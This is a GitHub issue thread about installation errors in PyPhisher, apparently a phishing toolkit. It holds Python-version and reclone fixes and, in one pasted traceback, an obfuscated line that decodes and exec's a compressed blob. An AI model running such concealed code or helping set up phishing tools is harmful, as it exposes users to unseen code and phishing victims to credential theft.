### ISSUE TITLE
python 3.8 doesn't have BooleanOptionalAction

### ISSUE THREAD

**Issue by rahul-01010** [KasRoudra/PyPhisher#68]
after command python3 pyphisher.py
error detect:-cannot import name 'BooleanOptionalAction' from 'argparse' (/usr/lib/python3.8/argparse.py)

**Comment by KasRoudra** [comment]
@rahul-01010 Update your python version. My code is for python 3.10, not 3.8

**Comment by mustard00** [comment]
Traceback (most recent call last):
  File "pyphisher.py", line 92, in <module>
    _ = lambda __ : __import__("\x7a\x6c\x69\x62").decompress(__import__("\x62\x61\x73\x65\x36\x34").b16decode(__[::-1]));exec((_)(b'0E272826F77D7D7CBD78242EA15B872300EED2B5083A5DD1F0C455025821798A3FB3F586448770FD717A9AED177F8EC727EF6F73C887919BF5AB24778546F834979BA548316DE48FAB20E138FAACBE5341ECC49D84B2B4996D903D87CE75DC181F57F0B7DD33137E3603E39BD0B055EC4FD1176883A4502B452A3A7321C45EE8539FCE5853D7C6DC5B228A312CF1827EC27B4FAA8C0D89C27107062EAE348B1CD4FCC129D99B165CE93860883104DED6827042D45C92CBE5DB3C6040EB36F418B45B5605E45BBDBC1F71063003ED0E1AB767671F3C3E1A94D2BCBCDED2B3422A35995E56E054C697820A30963104A1A217606D1A097A4C827C8A79D773A9DD8D76D6949F87C7FFE3FBFBF3F3F7F3F7F9F8236C71D888D98F4FB359A644B61818C28FF67C4639F834800481E6B41951C987'))
  File "<string>", line 1, in <module>
  File "<string>", line 1, in <module>
  File "<string>", line 8, in <module>
ImportError: cannot import name 'BooleanOptionalAction' from 'argparse' (/usr/lib/python3.8/argparse.py)

pleasse can you explain me why??

**Comment by KasRoudra** [comment]
@rahul-01010 Read your error. It still says python 3.8

**Comment by Swapnil645** [comment]
@rahul-01010 
This is for Ubuntu. Run these two commands
sudo update-alternatives --install /usr/bin/python3 python3 /usr/bin/python3.8 1

sudo update-alternatives --install /usr/bin/python3 python3 /usr/bin/python3.9 2

It worked for me or you can refer to this site

https://phoenixnap.com/kb/upgrade-python

**Comment by Swapnil645** [comment]
After solving this issue.. I am facing another one.

FileNotFoundError: [Errno 2] No such file or directory at line 613

The Pyphisher gif is getting printed after that I am receiving this error.
Please help me out.

**Comment by KasRoudra** [comment]
@Swapnil645 Delete the folder and clone again. Probably some of the necesessary files are deleted

**Comment by KasRoudra** [comment]
Solved this in last commit. Delete and clone again❤️
